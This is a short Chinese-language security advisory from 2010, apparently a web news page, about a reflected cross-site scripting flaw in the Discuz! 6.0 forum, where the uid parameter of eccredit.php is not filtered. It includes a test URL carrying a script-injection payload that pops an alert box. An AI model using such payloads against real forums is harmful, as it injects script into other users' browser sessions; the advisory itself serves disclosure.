频道栏目
首页 > 安全 > 网站安全 > 正文

Discuz! 6.0论坛uid参数远程跨站脚本漏洞

2010-03-08 12:29:01           
收藏   我要投稿


Discuz!是一款华人地区非常流行的Web论坛程序。

Discuz!论坛没有正确的过滤提交给eccredit.php页面的uid参数,远程攻击者可以通过向论坛提交恶意参数请求执行跨站脚本攻击,导致在用户浏览器会话中注入并执行任意HTML和脚本代码。


测试方法:http://www.hackqing.cn/eccredit.php?action=list&uid="><script>alert(/hackqing/);</script>

上一篇:ARP挂马攻击--嗅探欺骗的最恐怖方式
下一篇:再探偏移注射
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站